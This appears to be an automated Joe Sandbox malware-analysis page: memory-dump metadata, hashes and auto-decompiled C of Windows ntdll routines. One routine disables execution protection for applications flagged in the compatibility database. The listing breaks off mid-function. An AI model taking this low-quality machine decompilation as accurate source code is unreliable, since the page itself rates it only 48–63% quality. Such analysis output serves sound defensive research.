Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaf5a85ddefe6147743c8e9167aee52dd321e13e2777ee47c0ad789044312560
Instruction ID: 5b490ba52e560017f895218656275fc68591b768b8bd77dff39ec955ad998428
Opcode Fuzzy Hash: aaf5a85ddefe6147743c8e9167aee52dd321e13e2777ee47c0ad789044312560
Instruction Fuzzy Hash: 3190027130240403D54065584914607100547D0302F61C416A3054515EDA398C557536

Uniqueness

Uniqueness Score: -1.00%

Function 36B22FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adce6c947f3fd9340b567197f0c971b93f894d16938c185ddd6ec0d72a0d30db
Instruction ID: 7facf24d700ac99388f885660d7661bb5cd504282670886c98aceb9d70b9115d
Opcode Fuzzy Hash: adce6c947f3fd9340b567197f0c971b93f894d16938c185ddd6ec0d72a0d30db
Instruction Fuzzy Hash: BC90023134200802D54071588524707100687D0601F61C416A1014514DD62689697AB2

Uniqueness

Uniqueness Score: -1.00%

Function 36B22F30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b907db9a59b1ad2ecd2b910091116140e72b3e8fb9583c8b59047c8972b333
Instruction ID: dab74ae60a18ae60db2808819bd82ae76dc3eb944ccaed745fa721b76e375c85
Opcode Fuzzy Hash: c2b907db9a59b1ad2ecd2b910091116140e72b3e8fb9583c8b59047c8972b333
Instruction Fuzzy Hash: 8390023130244442D54062584914B0F510547E1202FA1C41EA5146514CD92588596B22

Uniqueness

Uniqueness Score: -1.00%

Function 36B23C90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a171e084e5f6c31c6976e755266a0409801c137cc85a32a1a650c598b035ec1
Instruction ID: 4c014269a99d52ec35a7f9b024db628e563d5c9d3d3584f90d5cffc85600cbf1
Opcode Fuzzy Hash: 4a171e084e5f6c31c6976e755266a0409801c137cc85a32a1a650c598b035ec1
Instruction Fuzzy Hash: 7D90023530200402D91061585914646104647D0301F61D816A1414518DD66488A5B522

Uniqueness

Uniqueness Score: -1.00%

Function 36B22CD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 142e1dfff8ee0d99b1caffb2d044c811be5ec68aca5c1cceba8de10614a1545e
Instruction ID: cd1751345ff38da4056e9ec38fe42c61f67f34ff93b3d436e83f166dce2e4747
Opcode Fuzzy Hash: 142e1dfff8ee0d99b1caffb2d044c811be5ec68aca5c1cceba8de10614a1545e
Instruction Fuzzy Hash: 2990023134200402D54171584514606100957D0241FA1C417A1414514ED6658A5ABE62

Uniqueness

Uniqueness Score: -1.00%

Function 36B23C30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1229ef7e69f88d5a929aa2d83858c372b96ec468ac6296388c52dcfc212614f
Instruction ID: 0bd9174cc24dcb7d206dae96a4dc878b2748214288176158566f2842a6c8512c
Opcode Fuzzy Hash: c1229ef7e69f88d5a929aa2d83858c372b96ec468ac6296388c52dcfc212614f
Instruction Fuzzy Hash: 8290023130300142994062585914A4E510547E1302BA1D81AA1005514CD92488656622

Uniqueness

Uniqueness Score: -1.00%

Function 36B22C20 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ce03922672327800644fb4dbfffb26a6e3022941fd4c6fa7b68afdeb53bf7a6
Instruction ID: 4b96ad2d252ca65ec85a4d51f692afe33367c00d55af4ec3de9b846f052c084e
Opcode Fuzzy Hash: 8ce03922672327800644fb4dbfffb26a6e3022941fd4c6fa7b68afdeb53bf7a6
Instruction Fuzzy Hash: 1190043130704443D500755C551CF07100547D0305F71D417F3054555DD735CC55F533

Uniqueness

Uniqueness Score: -1.00%

Function 36B22C10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4016cca7b9449bb681356e9348f4aa6c894324ca71214c30b825bab2b9a4a6c
Instruction ID: 4fb09e83b7e3f4a393ee5209dbadb135be566e7935e76a7e6a4495d8db535bae
Opcode Fuzzy Hash: b4016cca7b9449bb681356e9348f4aa6c894324ca71214c30b825bab2b9a4a6c
Instruction Fuzzy Hash: EB90023130200403D50061585618707100547D0201F61D816A1414518DE66688557522

Uniqueness

Uniqueness Score: -1.00%

Function 36B22D50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db8dbcda5a9aedd42ff81d0d4c9cd48d6e1fdaa22172e9ae8bffac1fe91de406
Instruction ID: adcff5c18011004bb890783423c56e87f61be4106ace50ee5eac5feba76b398b
Opcode Fuzzy Hash: db8dbcda5a9aedd42ff81d0d4c9cd48d6e1fdaa22172e9ae8bffac1fe91de406
Instruction Fuzzy Hash: 5090023130200402D50261584524606100987D1345FA1C417E2414515DD6358957B533

Uniqueness

Uniqueness Score: -1.00%

Function 36B22AA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1e062eb8089b801fbc7ec9967354c69357f719ff5c05503bb433b08b624c99
Instruction ID: 00ad687309e062efead1642db1443f194e4f4eb578f1bd0d88817a80e661b183
Opcode Fuzzy Hash: 9c1e062eb8089b801fbc7ec9967354c69357f719ff5c05503bb433b08b624c99
Instruction Fuzzy Hash: 6690023130200802D50461584914686100547D0301F61C416A7014615EE67588957532

Uniqueness

Uniqueness Score: -1.00%

Function 36B22AC0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddc31632f63abfd2c21e9ce227e45e007de5fa483d6d91520e942e2fe9b8ed50
Instruction ID: 910f37cd8a5e7ea8cf4e1bc6f2e816cae9113a846587679ef634d4184f8a6e73
Opcode Fuzzy Hash: ddc31632f63abfd2c21e9ce227e45e007de5fa483d6d91520e942e2fe9b8ed50
Instruction Fuzzy Hash: 8590023170600802D55071584524746100547D0301F61C416A1014614DD7658A597AA2

Uniqueness

Uniqueness Score: -1.00%

Function 36B22A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72507e37d805c2ddb0fe6e15ceb509cf8e53fe0c369fc0d563a7263ffb8b037e
Instruction ID: 9593e2ef3fcb39e526d64f341f6bd8eb88904247119b2d033c219b74f9aa2664
Opcode Fuzzy Hash: 72507e37d805c2ddb0fe6e15ceb509cf8e53fe0c369fc0d563a7263ffb8b037e
Instruction Fuzzy Hash: 55900235322000020545A558071450B144557D63513A1C41AF2406550CD63188696722

Uniqueness

Uniqueness Score: -1.00%

Function 36B22B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e631aaf97c083a1616f83619bfcd1dc9b21cb2e4a4c99c7b8c24eefd67e45697
Instruction ID: 567a632e61cb246a7ba5f7455fa7d2e7740f184d5f3d37d52146d8a4c1382daf
Opcode Fuzzy Hash: e631aaf97c083a1616f83619bfcd1dc9b21cb2e4a4c99c7b8c24eefd67e45697
Instruction Fuzzy Hash: 7290023130200842D50061584514B46100547E0301F61C41BA1114614DD625C8557922

Uniqueness

Uniqueness Score: -1.00%

Function 36B22BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78020ea3128d279ae021bd6540c67c67abbe5d1450501f989ec9910ef55da692
Instruction ID: 65c6caf5f1cc6ec84ac7af2894a7e06bfe1733e0b64c335495f93099b302a3ae
Opcode Fuzzy Hash: 78020ea3128d279ae021bd6540c67c67abbe5d1450501f989ec9910ef55da692
Instruction Fuzzy Hash: 7590023170600402D54071585528706101547D0201F61D416A1014514DD6698A597AA2

Uniqueness

Uniqueness Score: -1.00%

Function 36B22B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2180c407cd8899e56f9a575bcea09fa4bd68004db899bdf650aa0e6c39734ef1
Instruction ID: a2deeac2d0dc75b0522edb8ab69391b81a031e86665a485ebd291b123965e432
Opcode Fuzzy Hash: 2180c407cd8899e56f9a575bcea09fa4bd68004db899bdf650aa0e6c39734ef1
Instruction Fuzzy Hash: 6F90023130604842D54071584514A46101547D0305F61C416A1054654DE6358D59BA62

Uniqueness

Uniqueness Score: -1.00%

Function 36B238D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f11381806c235788b6b2871ef9cf28e89fe15516c602247640c1eb2cc8829e1
Instruction ID: 37211ad1840a540d38afffa8a06d7f1a38501f30e74b05aa7825f43d74efd2f2
Opcode Fuzzy Hash: 3f11381806c235788b6b2871ef9cf28e89fe15516c602247640c1eb2cc8829e1
Instruction Fuzzy Hash: 2090023134605102D550715C4514616500567E0201F61C426A1804554DD56588597622

Uniqueness

Uniqueness Score: -1.00%

Function 36B229D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329e696a4f4c0f8d5a347bcf5a3740570b0f7a61d0e701843fc9a7de4cbf3955
Instruction ID: cba4eb9121c73dcd244e068dce336af25659698122d5e27ea5ccac8823e9d7c2
Opcode Fuzzy Hash: 329e696a4f4c0f8d5a347bcf5a3740570b0f7a61d0e701843fc9a7de4cbf3955
Instruction Fuzzy Hash: 319002B1302140924900A2588514B0A550547E0201B61C41BE2044520CD5358855A536

Uniqueness

Uniqueness Score: -1.00%

Function 36B22B20 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 36BBA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 36BBA25D
RtlDebugPrintTimes.NTDLL ref: 36BBA2F1
RtlDebugPrintTimes.NTDLL ref: 36BBA314
RtlDebugPrintTimes.NTDLL ref: 36BBA340
RtlDebugPrintTimes.NTDLL ref: 36BBA415
RtlDebugPrintTimes.NTDLL ref: 36BBA468
RtlDebugPrintTimes.NTDLL ref: 36BBA487
RtlDebugPrintTimes.NTDLL ref: 36BBA4B8

Strings

HEAP: , xrefs: 36BBA206

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: eb56b655f5bcd38fadc5d45800afc6b78d195172762d57d8c987cda223e2a662
Instruction ID: 24d56a5f6569abd4c269e1df2aa26bef31a1942e87af9f973d1a597d3993746c
Opcode Fuzzy Hash: eb56b655f5bcd38fadc5d45800afc6b78d195172762d57d8c987cda223e2a662
Instruction Fuzzy Hash: FBA17975A14322CFDB14CE18C894A2ABBE6FB88354F154529EA45DB310EBB1EC45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36B17550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E36B17550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x36bdb370 ^ _t107;
				_v8 =  *0x36bdb370 ^ _t107;
				_t105 = __ecx;
				if( *0x36bd6664 == 0) {
					L5:
					return E36B24B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E36AEE580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E36B17738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E36B1763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push("true");
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E36B22B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E36B176ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E36B6EF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E36B28F40( &_v548, 0, 0x214);
						_t106 =  *0x36bd6664;
						_t110 = _t108 + 0x20;
						 *0x36bd91e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x36bd6664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E36B24C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E36B6EF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E36B2A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E36B6EF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E36B2A690(_t106, "true");
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E36B6EF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E36B5CC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E36B6EF10();
						goto L15;
					}
					L8:
					_t56 = E36B17648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x36b17560
0x36b17562
0x36b1756f
0x36b17571
0x36b175ab
0x36b175b9
0x36b175b9
0x36b17579
0x36b17583
0x36b1758f
0x36b54443
0x36b17595
0x36b1759e
0x36b1759e
0x36b175a2
0x36b175bc
0x36b175c2
0x36b175c7
0x36b175c9
0x36b17621
0x36b17623
0x36b17624
0x36b175f8
0x36b175ff
0x36b17601
0x36b1762c
0x36b17603
0x36b17609
0x36b17610
0x36b17612
0x36b17612
0x36b17612
0x36b17614
0x36b17616
0x36b17630
0x36b17633
0x36b17633
0x36b17618
0x36b1761a
0x36b545c9
0x36b545c9
0x36b545d1
0x36b545d2
0x36b545d4
0x36b545d6
0x36b545d6
0x00000000
0x36b1761a
0x36b175ce
0x36b175d4
0x36b175da
0x36b175df
0x36b175e1
0x36b5444a
0x36b54450
0x00000000
0x00000000
0x36b54456
0x36b54469
0x36b54476
0x36b54486
0x36b5448b
0x36b54497
0x36b544b9
0x36b544bf
0x36b544c1
0x36b544c3
0x00000000
0x00000000
0x36b544c9
0x36b544cf
0x36b544d1
0x00000000
0x00000000
0x36b544dc
0x36b544de
0x00000000
0x00000000
0x36b544e6
0x36b544ed
0x36b544ef
0x36b545c4
0x00000000
0x36b545c4
0x36b544f7
0x36b544f8
0x36b54510
0x36b54515
0x36b54524
0x36b5452b
0x36b5452c
0x36b5452e
0x36b54556
0x36b54561
0x36b54567
0x36b54569
0x36b5456c
0x36b5456e
0x36b54574
0x36b54576
0x00000000
0x00000000
0x00000000
0x00000000
0x36b5457c
0x36b5457c
0x36b54584
0x36b54588
0x36b5458a
0x36b5458c
0x36b5458e
0x36b5458e
0x36b5459b
0x36b545a0
0x36b545a7
0x36b545ac
0x36b545ae
0x00000000
0x00000000
0x36b545b4
0x36b545b4
0x36b545b7
0x36b545b7
0x00000000
0x36b545bf
0x36b54530
0x36b54535
0x36b54537
0x36b54539
0x00000000
0x36b5453e
0x36b175e7
0x36b175e9
0x36b175ee
0x36b175f0
0x00000000
0x00000000
0x36b175f2
0x00000000
0x36b175a4
0x36b175a4
0x36b175a4
0x00000000
0x36b175a4

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 36B5454D
ExecuteOptions, xrefs: 36B544AB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36B54460
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36B54530
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36B54507
Execute=1, xrefs: 36B5451E
CLIENT(ntdll): Processing section info %ws..., xrefs: 36B54592

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: eb692bfe463e80d9f7f92a4f340052a1d8fe21aceb28cb23de810b4be13c6a3a
Instruction ID: b90a6f1626e9bf35c849c4f09818e20480c172219ace39aeab896aeef5c41d10
Opcode Fuzzy Hash: eb692bfe463e80d9f7f92a4f340052a1d8fe21aceb28cb23de810b4be13c6a3a
Instruction Fuzzy Hash: A251F571A00229BBEB109FA5EC99FED77A8FF08344F5004B9E605A7180EB709E55CF61

Uniqueness

Uniqueness Score: -1.00%

Function 36AFA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E36AFA170(signed char _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed char _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				signed int _v60;
				char _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v85;
				void* _v88;
				void* _v96;
				void* _v109;
				intOrPtr _t128;
				void* _t129;
